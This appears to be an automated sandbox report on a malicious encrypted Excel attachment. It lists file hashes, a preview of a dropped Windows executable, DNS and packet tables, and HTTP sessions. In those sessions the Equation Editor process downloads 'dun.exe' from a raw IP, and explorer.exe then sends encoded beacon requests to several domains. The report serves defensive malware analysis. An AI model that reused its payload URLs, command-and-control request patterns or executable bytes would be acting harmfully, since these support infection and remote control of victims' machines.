SSDEEP:	24576:JvvbQF4jajOm9u+d7bs6IpQf4DMqMuulZcjLsq3ut:FbQOmi0Zbwp3DlFu
MD5:	214B1DDF045E4D6FDD73A5C8788D2ADC
SHA1:	8BB7C462FB649D16EDB98AB526DF8475A329CC71
SHA-256:	D8E25CE44C46057985A0467ADCF4FC12D8BEAC599E3031F6674FD1E01988267E
SHA-512:	781FFF07EDCB65EC4C77C80F20A6C6AA658F4679C411654ABCDC1233F19CEA170B47EBB5A4227618459482F32462AF12188A7CB870BD3EB347696485BB530E3C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L.a..............P..p.............. ........@.. ....................................@.................................x...O.................................................................................... ............... ..H............text....o... ...p.................. ..`.rsrc................r..............@..@.reloc...............d..............@..B........................H.......L...d8......M....................................................(....&..(......s.........s ........s!........s"........s#...........0...........~....o$....+...0...........~....o%....+...0...........~....o&....+...0...........~....o'....+...0...........~....o(....+...0..<........~.....().....,!r...p.....(...o+...s,............~.....+...0...........~.....+.."........0..&........(....r%..p~....o-...(......t$....+..Vs....(/...t...........(0...*.0..........

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.99483782151375
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	oustanding 03082921.xlsx
File size:	1328640
MD5:	643fc978b1f9e32668a88202a7091266
SHA1:	ee970a6713bd017fd118a1eb54a237339c4fd579
SHA256:	e3469b3d96e6316114395abe8caef91aa9ac9edac2d701c2d64981d3c0dfc5f0
SHA512:	f79bb5fa23c6a11c3a472a7788e766fff9a20569f81aeec2b0c8fdb3468c8c1684689848da1a8c0984a07ef781c980cf33ed0d81ae9550b654fba25bd2b32f10
SSDEEP:	24576:hf9gv6PaMg7ZG90Gv9LITkAoPZGr/ST/1HLU+CZdKd6Hfsc+Xu2ZTHQI5O:rguaJ2viu+/8/1rKZdK+fXuTpQI5O
File Content Preview:	........................>...............................................................................................................~...............z......................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
08/03/21-16:51:55.653334	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49169	34.102.136.180	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 16:50:35.938045025 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.105318069 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.105552912 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.106041908 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.275635004 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.275665045 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.275685072 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.275701046 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.275732040 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.275767088 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.445563078 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.445595980 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.445614100 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.445630074 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.445646048 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.445662022 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.445676088 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.445693016 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.445812941 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.447524071 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.618575096 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.618609905 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.618757963 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.618776083 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.618793011 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.618837118 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.618854046 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.618870974 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.618887901 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.619154930 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.619173050 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.619189978 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.619205952 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.619224072 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.619239092 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.622759104 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.627042055 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.792352915 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792388916 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792403936 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792417049 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792429924 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792455912 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792486906 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792499065 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792514086 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792582989 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792612076 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792628050 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792644978 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792712927 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792732000 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.792742014 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792758942 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792774916 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.792826891 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.792826891 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792846918 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792859077 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792887926 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.794888973 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.795614958 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961519003 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961546898 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961565018 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961582899 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961595058 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961607933 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961620092 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961632967 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961646080 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961653948 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961659908 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961672068 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961684942 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961690903 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961698055 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961702108 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961714983 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961731911 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961747885 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961749077 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961766005 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961767912 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961786032 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961786032 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961796999 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961805105 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961821079 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961824894 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961838961 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961841106 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961853027 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961855888 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961872101 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961873055 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961888075 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961889982 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961905003 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961905956 CEST	49167	80	192.168.2.22	13.229.216.142

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 16:51:50.256117105 CEST	52197	53	192.168.2.22	8.8.8.8
Aug 3, 2021 16:51:50.309530020 CEST	53	52197	8.8.8.8	192.168.2.22
Aug 3, 2021 16:51:55.481079102 CEST	53099	53	192.168.2.22	8.8.8.8
Aug 3, 2021 16:51:55.519848108 CEST	53	53099	8.8.8.8	192.168.2.22
Aug 3, 2021 16:52:00.666630983 CEST	52838	53	192.168.2.22	8.8.8.8
Aug 3, 2021 16:52:00.707321882 CEST	53	52838	8.8.8.8	192.168.2.22
Aug 3, 2021 16:52:05.789819956 CEST	61200	53	192.168.2.22	8.8.8.8
Aug 3, 2021 16:52:05.987095118 CEST	53	61200	8.8.8.8	192.168.2.22
Aug 3, 2021 16:52:11.364415884 CEST	49548	53	192.168.2.22	8.8.8.8
Aug 3, 2021 16:52:11.686054945 CEST	53	49548	8.8.8.8	192.168.2.22
Aug 3, 2021 16:52:22.284992933 CEST	55627	53	192.168.2.22	8.8.8.8
Aug 3, 2021 16:52:22.342732906 CEST	53	55627	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 3, 2021 16:51:50.256117105 CEST	192.168.2.22	8.8.8.8	0x2e78	Standard query (0)	www.cleanxcare.com	A (IP address)	IN (0x0001)
Aug 3, 2021 16:51:55.481079102 CEST	192.168.2.22	8.8.8.8	0x2f03	Standard query (0)	www.iotcloud.technology	A (IP address)	IN (0x0001)
Aug 3, 2021 16:52:00.666630983 CEST	192.168.2.22	8.8.8.8	0x3c4e	Standard query (0)	www.micheldrake.com	A (IP address)	IN (0x0001)
Aug 3, 2021 16:52:05.789819956 CEST	192.168.2.22	8.8.8.8	0x6ec7	Standard query (0)	www.ruhexuangou.com	A (IP address)	IN (0x0001)
Aug 3, 2021 16:52:11.364415884 CEST	192.168.2.22	8.8.8.8	0xf09a	Standard query (0)	www.adultpeace.com	A (IP address)	IN (0x0001)
Aug 3, 2021 16:52:22.284992933 CEST	192.168.2.22	8.8.8.8	0x18f7	Standard query (0)	www.trendbold.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 3, 2021 16:51:50.309530020 CEST	8.8.8.8	192.168.2.22	0x2e78	No error (0)	www.cleanxcare.com	cleanxcare.com		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 16:51:50.309530020 CEST	8.8.8.8	192.168.2.22	0x2e78	No error (0)	cleanxcare.com		78.31.67.91	A (IP address)	IN (0x0001)
Aug 3, 2021 16:51:55.519848108 CEST	8.8.8.8	192.168.2.22	0x2f03	No error (0)	www.iotcloud.technology	iotcloud.technology		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 16:51:55.519848108 CEST	8.8.8.8	192.168.2.22	0x2f03	No error (0)	iotcloud.technology		34.102.136.180	A (IP address)	IN (0x0001)
Aug 3, 2021 16:52:00.707321882 CEST	8.8.8.8	192.168.2.22	0x3c4e	No error (0)	www.micheldrake.com	micheldrake.com		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 16:52:00.707321882 CEST	8.8.8.8	192.168.2.22	0x3c4e	No error (0)	micheldrake.com		192.0.78.25	A (IP address)	IN (0x0001)
Aug 3, 2021 16:52:00.707321882 CEST	8.8.8.8	192.168.2.22	0x3c4e	No error (0)	micheldrake.com		192.0.78.24	A (IP address)	IN (0x0001)
Aug 3, 2021 16:52:05.987095118 CEST	8.8.8.8	192.168.2.22	0x6ec7	No error (0)	www.ruhexuangou.com		23.82.57.32	A (IP address)	IN (0x0001)
Aug 3, 2021 16:52:11.686054945 CEST	8.8.8.8	192.168.2.22	0xf09a	No error (0)	www.adultpeace.com	adultpeace.com		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 16:52:11.686054945 CEST	8.8.8.8	192.168.2.22	0xf09a	No error (0)	adultpeace.com		163.44.239.73	A (IP address)	IN (0x0001)
Aug 3, 2021 16:52:22.342732906 CEST	8.8.8.8	192.168.2.22	0x18f7	No error (0)	www.trendbold.com		64.190.62.111	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

13.229.216.142

www.cleanxcare.com

www.iotcloud.technology

www.micheldrake.com

www.ruhexuangou.com

www.adultpeace.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	13.229.216.142	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 16:50:36.106041908 CEST	0	OUT	GET /www/dun.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 13.229.216.142 Connection: Keep-Alive
Aug 3, 2021 16:50:36.275635004 CEST	1	IN	HTTP/1.1 200 OK Date: Tue, 03 Aug 2021 14:50:43 GMT Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7 Last-Modified: Tue, 03 Aug 2021 14:09:54 GMT ETag: "146600-5c8a83d6b91fb" Accept-Ranges: bytes Content-Length: 1336832 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d4 4c 09 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 70 10 00 00 f4 03 00 00 00 00 00 ca 8f 10 00 00 20 00 00 00 a0 10 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 14 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 78 8f 10 00 4f 00 00 00 00 a0 10 00 a0 f0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 14 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 6f 10 00 00 20 00 00 00 70 10 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a0 f0 03 00 00 a0 10 00 00 f2 03 00 00 72 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 14 00 00 02 00 00 00 64 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 8f 10 00 00 00 00 00 48 00 00 00 02 00 05 00 4c a3 04 00 64 38 04 00 03 00 00 00 4d 08 00 06 b0 db 08 00 c8 b3 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 1d 00 00 0a 2a 26 00 02 28 1e 00 00 0a 00 2a ce 73 1f 00 00 0a 80 01 00 00 04 73 20 00 00 0a 80 02 00 00 04 73 21 00 00 0a 80 03 00 00 04 73 22 00 00 0a 80 04 00 00 04 73 23 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 24 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 25 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 26 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 27 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 28 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 29 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2a 00 00 0a 6f 2b 00 00 0a 73 2c 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 25 00 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 56 73 0e 00 00 06 28 2f 00 00 0a 74 06 00 00 02 80 08 00 00 04 2a 1e 02 28 30 00 00 0a 2a 13 30 01 00 0b 00 00 00 09 00 00 11 00 7e 08 00 00 04 0a Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELLaPp @ @xO H.texto p `.rsrcr@@.relocd@BHLd8M(&(ss s!s"s#0~o$+0~o%+0~o&+0~o'+0~o(+0<~(),!rp(o+s,~+0~+"0&(r%p~o-(.t$+Vs(/t(0*0~

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49168	78.31.67.91	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 16:51:50.440246105 CEST	1411	OUT	GET /p2io/?dzuD7VXH=pxlxKDNxRow4YEfruB4Bv4ohCC0AYWvU81HhH938ZriMjSGbLHz+dxzd3d03S+kNJyuCfQ==&bzr8U=6lxL-0XX HTTP/1.1 Host: www.cleanxcare.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 3, 2021 16:51:50.469618082 CEST	1412	IN	HTTP/1.1 301 Moved Permanently Connection: close Content-Type: text/html Content-Length: 707 Date: Tue, 03 Aug 2021 14:51:50 GMT Location: https://www.cleanxcare.com/p2io/?dzuD7VXH=pxlxKDNxRow4YEfruB4Bv4ohCC0AYWvU81HhH938ZriMjSGbLHz+dxzd3d03S+kNJyuCfQ==&bzr8U=6lxL-0XX X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49169	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 16:51:55.539252996 CEST	1413	OUT	GET /p2io/?dzuD7VXH=L/l9chWXgd4NYCGd+vVro19pFM6JqqsPd4ppl3EKhtG9qh305X+esnK5qs3e0XUjSiRqvg==&bzr8U=6lxL-0XX HTTP/1.1 Host: www.iotcloud.technology Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 3, 2021 16:51:55.653333902 CEST	1414	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 03 Aug 2021 14:51:55 GMT Content-Type: text/html Content-Length: 275 ETag: "6104856e-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49170	192.0.78.25	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 16:52:00.727487087 CEST	1415	OUT	GET /p2io/?dzuD7VXH=d2NgnqRXaD3590PSrSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPppP981n7+M4uf60sw==&bzr8U=6lxL-0XX HTTP/1.1 Host: www.micheldrake.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
